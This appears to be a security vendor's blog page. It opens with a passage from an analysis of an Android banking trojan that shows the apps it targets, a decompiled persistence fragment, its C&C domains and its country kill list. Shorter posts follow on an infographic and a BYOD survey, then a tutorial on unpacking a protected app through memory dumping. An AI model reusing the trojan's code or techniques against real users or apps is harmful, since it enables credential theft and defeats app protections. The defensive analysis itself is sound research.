  • de.dkb.portalapp
  • com.ing.diba.mbbr2
  • de.ing_diba.kontostand
  • de.commerzbanking.mobil
  • de.consorsbank
  • com.db.mm.deutschebank
  • de.comdirect.android

The malware then searches for the related active processes. Once found, the malware constructs the corresponding URL used to retrieve the web interface from the C&C server. During this time, the malware uses an AlarmManager to keep the screen and WiFi on:

  protected void onCreate(Bundle paramBundle)

  {

    super.onCreate(paramBundle);

    if (i.c(getApplicationContext())) {

      return;

    }

    setContentView(2130903065); // layout.activity_main

    com.jlkbvcbyjjscyxvsudkmjabndnkrbn.api.e.j(this, com.jlkbvcbyjjscyxvsudkmjabndnkrbn.a.a.b); // process string/URL list store into  JSON format

    com.jlkbvcbyjjscyxvsudkmjabndnkrbn.api.e.h(this, “”); // root_phone

    com.jlkbvcbyjjscyxvsudkmjabndnkrbn.api.e.d(this, false); //app_kill

    com.jlkbvcbyjjscyxvsudkmjabndnkrbn.api.e.c(this, false); //free_dialog

    com.jlkbvcbyjjscyxvsudkmjabndnkrbn.api.e.g(this, false);

    this.p = new a(this);

    Settings.System.putInt(getContentResolver(), “wifi_sleep_policy”, 2);

    if (MainService.c == null)

    {

      MainService.c = ((PowerManager)getSystemService(“power”)).newWakeLock(1, MainService.b);

      MainService.c.acquire();

      MainService.d = ((WifiManager)getSystemService(“wifi”)).createWifiLock(1, b.aP);

      if (!MainService.d.isHeld()) {

        MainService.d.acquire();

      }

    }

Once the user starts the banking app, the malware contacts its C&C server to receive data used to create and activate another WebView and entice the user to enter banking credentials. For example, if the user opens the banking app “mobile.santander.de”, the malware retrieves the data by issuing the following request:

image06

The following is the comparison of the real banking interface and the fake one:

 image05   image01

The collected credentials will be sent to the same C&C server. The malware can accept the commands from the server to receive and send SMS messages. The malware can intercept SMS and can steal your two-factor authentication PIN to complete a transaction without you realizing it.

Currently, the malware uses three servers:

  • polo777555lolo.at
  • polo569noso.at
  • wahamer8lol77j.at

The domains are registered by “Koste Karima” in Merdzavan, a village in the Armavir Province of Armenia, the current IP is located in Germany:

image00

The malware calls getNetworkCountryIso()  and getSimCountryIso () to get the device and SIM card country code. It stops running if any one of the following country codes is found:

  • ru
  • rus
  • kz
  • ua
  • by
  • az
  • am
  • kg
  • md
  • tj
  • tm
  • uz
  • us

Summary
The attack is launched by cyber criminals driven by financial incentives. It scams people into giving up their banking login credentials and other personal data by displaying overlays that look nearly identical to banking apps’ login pages. Its malicious behavior is spreading to additional countries, expanding its footprint at a rapid pace. But with deep knowledge of the malware behavior, Trustlook’s anti-threat platform can effectively protect our users against invasion.

Top 5 Scariest Malware for Halloween

Happy Halloween! Trustlook has compiled a colorful Halloween Android malware infographic. Based on a study of 376,031 malware samples in the month of October, we have identified the Top 5 Scariest Malware families, and offer a close-up look of actual malicious apps. Here is what is in the infographic:

▪ Descriptions of the Top 5 Scariest Malware families
▪ Access to detailed reports (clickable) of 20 real malicious apps
▪ Tips to stay protected against malware

Click here to view to infographic.

 

 

Latest BYOD research is part of Trustlook Insights Q4 report

Trustlook has released its Q4 Trustlook Insights report which focuses on the latest trends and best practices in BYOD (Bring Your Own Device). BYOD is the practice of allowing employees to use personal devices at work. It gives employees freedom over where (and how) they work, and allows companies to spend less in operating expenses. Despite its rising popularity, many employers are still on the fence. If not fully understood and regulated, BYOD can threaten IT security and put a company’s sensitive business systems at risk.

This report is the result of a survey of 320 Trustlook Mobile Security users. Some findings validated existing beliefs, while others were truly fascinating in terms of how BYOD is treated and understood at organizations. Such as:

▪ Only 39% of companies have a formal BYOD policy
▪ 70% of employees use a personal device at work
▪ 86% of companies have no preferred mobile security app
▪ 51% of employees have received no training on BYOD

Feel free to download the survey report and infographic and explore the latest findings.

How to Unpack Baidu Protect through Memory Dumping

Trustlook Mobile Security has researched an app (MD5: 67257EA2E9EC6B35C9E5245927980EEA) that is packed/encrypted by Baidu Protect, the service provided by Baidu. Users can upload their APKs to the developer portal in Baidu to get their apps hardened.

The app terminates itself when running on several versions of Android emulators.

It runs on a Moto G phone with Android version 4.4.3. The app has the following structure:

image02

The file “libbaiduprotect.so” under the lib/armeabi folder shows that the app is packed by Baidu Protect.

Some popular unpacking tools don’t seem to work on this app. ZjDroid, for example, which is installed as a module for the Xposed, causes the app to crash. DexExtractor also doesn’t generate any DEX files.

The app has implemented anti-debugging techniques. For example, the following code snippets prevent the debugger from attaching to the process:

image01

Most app packers use JNI native code to modify the Dalvik bytecode in the memory. The packers sometime unpack/decrypt the real DEX file in the memory, which is what gave us a chance to dump the memory.

Using the ADB connect to the phone, we ran the “ps” command, which gave the following result:

image04

The app has the process ID “28953”. We examined the region of the virtual memory in the process.

The first address field shows the starting and ending address of the region in the process’s memory space. The last field shows the name of the file mapped. We fired up “dd” command to dump the memory associated with the last file.

image06

The “dd” command accepts decimal values in the parameters. Here the value for the “skip” parameter is the beginning address of the memory and the “count” parameter takes the range of the beginning and ending value.

After the file is dumped, we pull the file and examine it:

image05

The file is an ODEX file which has the header stripped. After retrieving the magic code, we have the following file:

image08

Unpack the file:

image07
image11
image09

Observe the JAR file:

image10

Note the above method does not work for apps using multiple processes. The memory dumping tool searching for the DEX magic code won’t work on this type of app.